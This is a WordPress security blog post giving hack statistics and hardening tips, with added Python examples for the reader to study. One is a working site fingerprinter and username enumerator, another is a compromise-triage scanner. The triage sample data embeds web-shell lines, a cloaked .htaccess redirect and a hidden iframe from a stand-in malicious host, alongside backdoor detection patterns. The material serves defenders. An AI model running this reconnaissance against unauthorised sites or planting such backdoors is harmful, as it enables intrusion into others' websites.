WordPress Security Based on Facts and Statistics

WordPress has become a common target for malicious hackers because it is so widely used and because so many installations are easy to break into. Last year alone over 170,000 WordPress blogs and websites were hacked, and the number of hacked WordPress sites is expected to rise further in 2013.

Why is that, when WordPress itself is a very secure platform? Let’s look at some statistics from last year’s incidents and learn from them, so that your WordPress site is not the next target.

Learning from WordPress Hacking Facts

Below are the statistics from the 170,000 hacked WordPress sites reported last year (the figures come from an infographic compiled by WP Template, as discussed in the comments below). I am using the word “reported” because not all website hacks are reported and made public; the real number of defaced and hacked WordPress blogs and websites is typically much bigger.

41% were hacked via their hosting provider. This means the attackers exploited a vulnerability in, or an insecure configuration of, the hosting environment and from there got into the WordPress blogs and websites hosted on it. On shared hosting this is often a neighbour problem: one compromised account on the server is used to reach the other sites it hosts.

29% were hacked via a vulnerability in the WordPress theme they were using. A hacker identified a vulnerability in a theme installed on the site and exploited it to gain access. Note that a theme does not have to be the active one to be exploitable: an old theme left in wp-content/themes still sits on disk, and its PHP files can often be requested directly.

22% were hacked via a vulnerability in a plugin installed on WordPress. As with themes, the attacker exploited a vulnerability in an installed plugin, and inactive plugins count too for the same reason.

8% were hacked because an account on the WordPress installation was using a weak password.

How to Hack a WordPress Website

After looking at the facts, let’s see how easy it is to hack a WordPress blog or website using a free tool called WPScan. WPScan is a black-box WordPress vulnerability scanner: it scans a WordPress website and identifies known issues and insecure configurations. By launching a default WPScan scan against a WordPress site you will instantly find out:

  • Which version of WordPress is running
  • Which theme is installed, its version and the path where it is installed
  • Which plugins are installed, their versions and the paths where they are installed

With WPScan you can also run several other, more advanced scans, such as user enumeration, where the scanner identifies and enumerates all usernames on the target site (for instance by requesting /?author=1, /?author=2 and so on and reading the author URL the site redirects to). A list of valid usernames halves the attacker’s work: a WordPress password brute force attack then only has to guess the password.
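The two scans just described, reconstructed as an added example. This is my own code, not part of the original article and not WPScan’s code: a passive fingerprint of the front page (generator meta tag, plugin and theme slugs in asset URLs) and an active user enumeration through author IDs. The sample site, its slugs and its version numbers are constructed; `http_fetch` is included for running the same checks against a site you are authorised to test.

```python
import re
import urllib.error
import urllib.request

# Constructed responses standing in for a live site: path -> (status, headers, body).
# Nothing here was captured from a real site; slugs and versions are illustrative.
SAMPLE_SITE = {
    "/": (200, {}, """<html><head>
<meta name="generator" content="WordPress 3.5.1" />
<link rel="stylesheet" href="http://blog.example/wp-content/themes/twentytwelve/style.css?ver=3.5.1" />
<script src="http://blog.example/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.3"></script>
<script src="http://blog.example/wp-content/plugins/wp-slimstat/js/slimstat.js?ver=2.9.4"></script>
</head><body></body></html>"""),
    "/?author=1": (301, {"Location": "http://blog.example/author/admin/"}, ""),
    "/?author=2": (301, {"Location": "http://blog.example/author/jdoe/"}, ""),
}


def fake_fetch(path):
    """Offline stand-in for an HTTP GET that does not follow redirects."""
    return SAMPLE_SITE.get(path, (404, {}, ""))


def http_fetch(base_url):
    """Build a fetch(path) for a real site (only one you are authorised to test).
    Redirects are surfaced rather than followed, because the Location header is the data."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # makes urllib raise HTTPError for 30x instead of following it
    opener = urllib.request.build_opener(NoRedirect)

    def fetch(path):
        try:
            with opener.open(base_url + path, timeout=10) as resp:
                return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.code, dict(err.headers), ""
    return fetch


GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="WordPress ([\d.]+)"', re.I)
COMPONENT_RE = re.compile(r'/wp-content/(plugins|themes)/([A-Za-z0-9_.-]+)/([^"\'\s<>]*)')
VERSION_RE = re.compile(r'[?&]ver=([\w.-]+)')
AUTHOR_SLUG_RE = re.compile(r'/author/([^/?#]+)/?')


def fingerprint(fetch):
    """Passive fingerprint from one request to the front page: the core version from the
    generator meta tag, plus plugin and theme slugs visible in asset URLs. The ?ver= value is
    whatever the developer passed to wp_enqueue_script/style: usually the component version,
    but a stylesheet enqueued without one (the theme here) carries the core version instead."""
    status, _headers, body = fetch("/")
    result = {"wordpress": None, "plugins": {}, "themes": {}}
    if status != 200:
        return result
    generator = GENERATOR_RE.search(body)
    if generator:
        result["wordpress"] = generator.group(1)
    for kind, slug, rest in COMPONENT_RE.findall(body):
        version = VERSION_RE.search(rest)
        # keep the first version seen per slug; later assets of the same component may differ
        result[kind].setdefault(slug, version.group(1) if version else None)
    return result


def enumerate_users(fetch, max_id=10):
    """Active user enumeration through author IDs: /?author=N redirects to /author/<nicename>/
    for every existing user ID, and the nicename defaults to the login name."""
    found = []
    for uid in range(1, max_id + 1):
        status, headers, _body = fetch(f"/?author={uid}")
        location = headers.get("Location") or headers.get("location") or ""
        match = AUTHOR_SLUG_RE.search(location) if status in (301, 302) else None
        if match:
            found.append((uid, match.group(1)))
    return found


if __name__ == "__main__":
    print(fingerprint(fake_fetch))
    print(enumerate_users(fake_fetch, max_id=4))
```

Against a live site, swap `fake_fetch` for `http_fetch("https://target.example")`. Two caveats: the slug list only shows components that emit assets on the page you fetched, and the `?ver=` value is a hint rather than proof of the installed version. WPScan confirms plugin versions from each plugin’s readme.txt, and so should you before drawing conclusions.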

Thanks to these simple scans, which only take a couple of minutes, a malicious hacker can:

  • Log in to your WordPress and gain admin access if any of your accounts is using a weak password
  • Exploit a known vulnerability in WordPress itself, if you are running an old version, to gain access to your website
  • Exploit a known vulnerability in any of your WordPress plugins and themes if you are not running the latest versions

As seen above, it is really easy to identify problems within a WordPress installation and possibly break in. But a person scanning your site by hand is not even the realistic scenario. Typically malicious hackers run automated tools that sweep ranges of websites for known vulnerabilities, and whatever gets flagged is broken into, no matter how small or obscure the site is. So in reality it is even easier than you think to hack a WordPress blog or website.

What Can Happen During a WordPress Hack Attack

Once a malicious hacker manages to gain access to a WordPress blog or website, he or she typically makes some of the following changes (and more) to hide their traces and retain access to the WordPress installation:

  • Create a new account with administrator privileges
  • Reset the passwords of several accounts so that the legitimate users cannot get back into their WordPress
  • Change the role of an existing dormant account (a forgotten subscriber promoted to administrator is less conspicuous than a brand-new account)
  • Inject malicious code into the content (posts, pages, widgets)
  • Tamper with WordPress source code files, adding malicious code such as backdoors
  • Add redirects to .htaccess files, often conditioned on the visitor’s user agent or referrer so that the site owner never sees them

If your database has been affected, there are plugins that can clean up the WordPress database. Bear in mind that removing the visible changes is not enough: unless you also close the hole the attacker came in through (the outdated plugin, the weak password, the vulnerable host) and remove every backdoor and rogue account, they will simply come back.
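An added example of looking for exactly the changes listed above, written for this page and not taken from the author’s plugin or from WordPress: it compares the current user list against a known-good baseline of roles (the same comparison an activity log, tip 6 below, gives you continuously), checks .htaccess for redirects to other hosts, scans PHP files for common backdoor constructs and for PHP living under wp-content/uploads, and scans post content for injected iframes and scripts. Every piece of data in it is constructed, and the backdoor signatures are a small illustrative set rather than a complete one.

```python
import re

# Constructed snapshot of a compromised site, standing in for what you would export from
# wp_users/wp_usermeta, the web root and wp_posts. No real site data.
SITE_HOST = "blog.example"
BASELINE_ROLES = {"admin": "administrator", "jdoe": "editor", "oldintern": "subscriber"}
USERS = [
    {"user_login": "admin", "role": "administrator", "user_registered": "2012-01-10"},
    {"user_login": "jdoe", "role": "editor", "user_registered": "2012-03-02"},
    {"user_login": "oldintern", "role": "administrator", "user_registered": "2012-06-15"},
    {"user_login": "wp_support", "role": "administrator", "user_registered": "2013-02-20"},
]
HTACCESS = """RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]
RewriteRule ^(.*)$ http://pharma.example.net/land.php?q=$1 [R=301,L]
RewriteRule ^index\\.php$ - [L]
RewriteRule . /index.php [L]
"""
FILES = {
    "wp-includes/version.php": "<?php\n$wp_version = '3.5.1';\n",
    # the base64 below decodes to a harmless phpinfo(); real droppers carry a full web shell
    "wp-content/themes/twentytwelve/footer.php": "<?php wp_footer(); eval(base64_decode('cGhwaW5mbygpOw==')); ?>",
    "wp-content/uploads/2013/02/image.php": "<?php @assert($_POST['c']); ?>",
}
POSTS = [
    {"ID": 12, "post_content": "<p>Hello world</p>"},
    {"ID": 13, "post_content": '<p>New release</p><iframe src="http://evil.example.org/x.php" style="display:none"></iframe>'},
]

# Small illustrative set of backdoor constructs; real scanners ship thousands of signatures.
BACKDOOR_PATTERNS = [
    (re.compile(r"\b(?:eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\["),
     "executes request input"),
    (re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
     "eval of obfuscated payload"),
]


def find_new_admins(users, baseline_roles):
    """Administrator accounts that did not exist in the known-good baseline."""
    return [f"{u['user_login']} (registered {u['user_registered']})"
            for u in users if u["role"] == "administrator" and u["user_login"] not in baseline_roles]


def find_role_changes(users, baseline_roles):
    """Existing accounts whose role differs from the baseline, e.g. a dormant subscriber promoted."""
    return [(u["user_login"], baseline_roles[u["user_login"]], u["role"]) for u in users
            if u["user_login"] in baseline_roles and baseline_roles[u["user_login"]] != u["role"]]


def scan_htaccess(text, site_host):
    """Rewrite/redirect rules that send visitors to another host. A preceding RewriteCond on the
    user agent or referrer marks a cloaked redirect: only crawlers or search visitors see it."""
    findings, cloaked = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("RewriteCond"):
            cloaked = cloaked or bool(re.search(r"HTTP_(?:USER_AGENT|REFERER)", line))
            continue
        if re.match(r"(?:RewriteRule|Redirect(?:Match|Permanent)?)\b", line):
            target = re.search(r"https?://([^/\s\"']+)", line)
            if target and target.group(1) != site_host:
                findings.append(("cloaked " if cloaked else "") + "external redirect: " + line)
            cloaked = False  # RewriteCond lines only apply to the next RewriteRule
    return findings


def scan_files(files):
    """Backdoor indicators: dangerous constructs, and PHP under uploads, which should only hold media."""
    findings = []
    for path, content in files.items():
        if path.startswith("wp-content/uploads/") and path.endswith(".php"):
            findings.append(f"{path}: PHP file inside uploads")
        for pattern, why in BACKDOOR_PATTERNS:
            if pattern.search(content):
                findings.append(f"{path}: {why}")
    return findings


def scan_posts(posts, site_host):
    """Injected content: iframes or scripts loaded from another host, and hidden iframes."""
    findings = []
    for post in posts:
        html = post["post_content"]
        for m in re.finditer(r"<(iframe|script)[^>]*\ssrc=[\"']https?://([^/\"']+)", html, re.I):
            if m.group(2) != site_host:
                findings.append(f"post {post['ID']}: {m.group(1)} loaded from {m.group(2)}")
        if re.search(r"<iframe[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden)", html, re.I):
            findings.append(f"post {post['ID']}: hidden iframe")
    return findings


def triage(users, baseline_roles, htaccess, files, posts, site_host=SITE_HOST):
    """Run every check and return (category, detail) findings for the incident responder."""
    findings = [("new-admin", d) for d in find_new_admins(users, baseline_roles)]
    findings += [("role-change", f"{u}: {old} -> {new}") for u, old, new in find_role_changes(users, baseline_roles)]
    findings += [("htaccess", d) for d in scan_htaccess(htaccess, site_host)]
    findings += [("file", d) for d in scan_files(files)]
    findings += [("post", d) for d in scan_posts(posts, site_host)]
    return findings


if __name__ == "__main__":
    for category, detail in triage(USERS, BASELINE_ROLES, HTACCESS, FILES, POSTS):
        print(f"[{category}] {detail}")
```

The baseline is the important part: you can only tell that “oldintern” was promoted or that “wp_support” is new if you recorded the legitimate state beforehand, which is what an activity log or a periodic export of wp_users gives you. Rather than trusting pattern matching alone, compare the core and plugin files against clean copies of the same versions as well.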

How to Protect WordPress from Hack Attacks

As we have just seen, hacking a WordPress site is very easy, and the good news is that securing it is easy too. Looking back at the facts above, here are some easy tips to get you started and improve the security of your WordPress website:

  1. Before choosing or changing your hosting provider, do some basic research: check forums and see what other people, fellow bloggers and WordPress administrators think of the provider you would like to use, and ask specifically how customer accounts are isolated from each other on shared servers.
  2. Before installing a WordPress theme or plugin, do some research and make sure it is legitimate and frequently updated. Follow the guide How to Choose the Best Plugin for WordPress for more on choosing the right, secure WordPress plugins and themes. Delete the themes and plugins you do not use rather than merely deactivating them.
  3. Remove or rename the WordPress default administrator account. If you are not sure how, follow this How to Change a WordPress username guide. Note that WordPress keeps a separate “nicename” for author URLs, so if you only change the login name the old one may still show up at /author/admin/ and the user enumeration described earlier will still reveal it; change both.
  4. Use strong passwords. By strong I mean at least 8 characters, not a dictionary word or your dog’s name, with upper case and lower case letters, numbers and special characters such as !, & and ?. Treat 8 as the floor rather than the target: a long passphrase resists brute force far better than a short complex string, and a password that appears in a public list of leaked passwords is weak no matter how it is composed.
  5. Keep WordPress, plugins, themes and any other software you use UP TO DATE by always running the latest available version and applying the security patches the vendor provides as soon as they are released.
  6. Monitor the activity of your WordPress website and its users with a security plugin such as the WP Security Audit Log plugin. It is similar to the Windows Event Log or syslog on Linux/Unix: it logs all types of activity on your WordPress blog or website, so the changes an attacker makes after breaking in (new administrators, role changes, password resets) show up instead of going unnoticed.

By following all of the tips above, the security of your WordPress will be drastically improved and your WordPress will be protected against the most common widespread attacks.
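To make tip 4 concrete, here is an added example of a password policy check, my own code rather than anything from the article or from WordPress. It applies the rules above, adds a leaked-password blocklist and a username check, and estimates the brute-force search space so you can see why length matters more than symbols. The blocklist and the guess rates are constructed assumptions, and the example goes beyond the text in one respect: passphrases of 16 or more characters are exempt from the composition rules.

```python
import math

# Constructed blocklist standing in for a real leaked-password list (in practice, use the top
# entries of a public breach corpus). Compared case-insensitively.
COMMON_PASSWORDS = {"password", "123456", "12345678", "qwerty", "admin", "letmein",
                    "welcome", "p@ssw0rd", "wordpress", "iloveyou"}

SPECIALS = set("!@#$%^&*()-_=+[]{};:'\",.<>/?\\|`~")  # 32 printable ASCII symbols
MIN_LEN = 8            # the article's floor
PASSPHRASE_LEN = 16    # assumption: from this length on, composition rules are waived


def check_password(pw, username="", blocklist=COMMON_PASSWORDS):
    """Return the list of rules the password breaks; an empty list means it is accepted."""
    problems = []
    if len(pw) < MIN_LEN:
        problems.append(f"shorter than {MIN_LEN} characters")
    if len(pw) < PASSPHRASE_LEN:  # short passwords must mix character classes
        if not any(c.islower() for c in pw):
            problems.append("no lower-case letter")
        if not any(c.isupper() for c in pw):
            problems.append("no upper-case letter")
        if not any(c.isdigit() for c in pw):
            problems.append("no digit")
        if not any(c in SPECIALS for c in pw):
            problems.append("no special character")
    if pw.lower() in blocklist:
        problems.append("on the common-password blocklist")
    if username and username.lower() in pw.lower():
        problems.append("contains the username")
    if len(set(pw)) <= 2:
        problems.append("too few distinct characters")
    return problems


def brute_force_bits(pw):
    """Search space in bits for an attacker who knows only the length and the character
    classes used. This is an upper bound: dictionary words, names and leet-speak
    substitutions fall to a wordlist long before the space is exhausted."""
    alphabet = 0
    if any(c.islower() for c in pw):
        alphabet += 26
    if any(c.isupper() for c in pw):
        alphabet += 26
    if any(c.isdigit() for c in pw):
        alphabet += 10
    if any(c in SPECIALS for c in pw):
        alphabet += len(SPECIALS)
    if " " in pw:
        alphabet += 1
    return len(pw) * math.log2(alphabet) if alphabet else 0.0


def seconds_to_exhaust(bits, guesses_per_second):
    """Worst-case time to try the whole space at the given rate."""
    return 2.0 ** bits / guesses_per_second


# Assumed orders of magnitude: an online attack on wp-login.php is limited by round trips
# and rate limiting; an offline attack on stolen wp_users hashes is limited only by hardware.
ONLINE_GUESSES_PER_SEC = 20
OFFLINE_GUESSES_PER_SEC = 1e7

if __name__ == "__main__":
    for pw in ["admin123", "P@ssw0rd", "Tr0ub4dor&3", "correct horse battery staple"]:
        bits = brute_force_bits(pw)
        days = seconds_to_exhaust(bits, OFFLINE_GUESSES_PER_SEC) / 86400
        print(f"{pw!r}: {check_password(pw, username='admin') or 'OK'}; "
              f"{bits:.0f} bits, offline worst case {days:.1f} days")
```

Run it and compare the two last candidates: the 11-character complex string and the 28-character lowercase passphrase both pass, but the passphrase has a far larger search space. The bit count is optimistic for real dictionary phrases, which is exactly why the blocklist check matters more than any composition rule.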

Taking WordPress Security a Step Further

There are several other things you can do to further improve the security of your WordPress site. As already explained, the tips above are the basics and should protect your site from the most common widespread attacks. But if you have the budget, and if your WordPress site is the hub of your business, it is worth beefing up its security further so that you are also protected against targeted attacks. For example, you can implement two-factor authentication, put HTTP authentication in front of wp-admin to shield it from zero-day vulnerabilities (leaving an exception for wp-admin/admin-ajax.php if any of your plugins call it from the front end), or follow an online WordPress security course. Regular professional WordPress security audits are also recommended, to make sure your site has no security holes that malicious attackers could exploit.

Keeping Up with WordPress Security

Security is not a one-time task; it is a never-ending process. The things you do now and in the future will affect the security of your WordPress site. But don’t fret: although it sounds like a daunting task that will haunt you forever, as you can see it is not rocket science. Strictly speaking, most of it is common sense.

Robert Abela

Robert is the CEO and founder of WP White Security, a niche WordPress security plugin development company based in the Netherlands, Europe. Their flagship product is WP Security Audit Log, the most comprehensive and widely used activity log plugin for WordPress sites and multisite networks.


9 Responses

  1. Hi James,

    Thank you for your positive feedback. The statistics you referred to were done by me as well; WP White Security is my website.

    As regards hosting, correct, I agree. But we shouldn’t blame hosting for not helping users secure their WordPress. And as Hackrepair pointed out, it is almost impossible for a hosting provider to implement mod_security for everyone because of compatibility issues. Else one has to implement a very lenient implementation not to affect other websites.

  2. Great post, Robert.

    James from ManageWP here.

    Security is such a problem for WordPress, and it’s clear that the security assault on WordPress isn’t going to stop. It’s just such a popular target to do massive amount of damage since so much of the Web runs on WordPress. Thanks for writing about this.

    Here’s another post I recently read that opened my eyes and that would complement this one (especially if you like stats): Statistics Show Why WordPress is a Popular Hacker Target

    A majority of our customers strongly desire security features, and it’s clearly obvious why. But, interestingly enough, it seems that webhosts, themselves, will likely play a bigger interest/role in securing WordPress on their own servers. Hopefully this results in less problems down the line, particularly for newer users who don’t know what they’re doing.

    1. There are real limits as to what a web host can do. While mod security rules and like can be helpful, they may likewise conflict with other clients. So it’s a catch-22 type situation.

      Hosts are about getting and “keeping” their customers. Doing things that may actually cause clients to move out due to ongoing issues is the reason why you will not normally see a shared host “including” NGINX or pre-set mod_security rules and the like.

      That said, most hosts believe that if a client “requires” a greater level of security they are willing to pay for it, in the form of VPS or cloud type hosting services, et al.

      The “Walmart hosts” are keen to sell you their add-ons to improve security, which is why most won’t include security “out of box” because, well, it’s going to hit their bottom line.

      Btw: if you didn’t know this, the “Walmart hosts” don’t make a dime on hosting. It’s the up-sell where they make their money. Reality check. . .

      Which is why it’s important that when you choose your web host you only choose one where they present and describe security as “their main feature” on their home page. Just Google for “Website Security and Customer Service hosting” to find the cream of the crop hosting wise.

      1. I agree with most of your points, and it’s exactly the point I was getting to. Which is why, in general, you shouldn’t opt for “Walmart hosts” (kudos for the term) in the first place where you have a real business to run, because the security, in general, is horrid.

        As to your other points, I’m very much aware. Having just attended HostingCon, webhosts realize what they need to do, and there’s no question that there’s going to be a price tag associated with it, because most people (not even yours truly) know the exact proper configurations for a VPS to make it sound and secure. So you either need to hit some lengthy tutorials on security, or you’ll pay for the privilege for someone else to ensure that security matters.

        As for shared, cookie-cutter hosting, they realize that it’s time for them to step up their game, and we’re going to see a lot of innovations in the next couple years on this front. 🙂

  3. I like your comment about choosing hosting providers. There are a lot of great “WordPress” providers out there with nearly instant customer service and support tailored for WordPress folks.

    WPEngine, TVC.Net and Page.ly are well regarded and good first looks when in need of a fast responsive, customer service oriented host.

  4. Excellent lowdown on WordPress security Robert, I’m sure many will find it useful. I’ll take the opportunity to remind our followers about our WordPress security lockdown service, through which we secure WordPress websites from the hacking possibilities mentioned above.

    1. Hi Goodwin,

      The statistics have been taken from an infographic which was published earlier this year by WP Template. Here is more information about the infographic and statistics:

      The list of sources WP Template used to generate the infographic are listed at the end of the infographic itself.

      In the meantime I am also working on some new interesting statistics which should also reflect the current situation of current WordPress installs and how quickly and frequently they are updated. Such statistics should be available later on the WP White Security website.
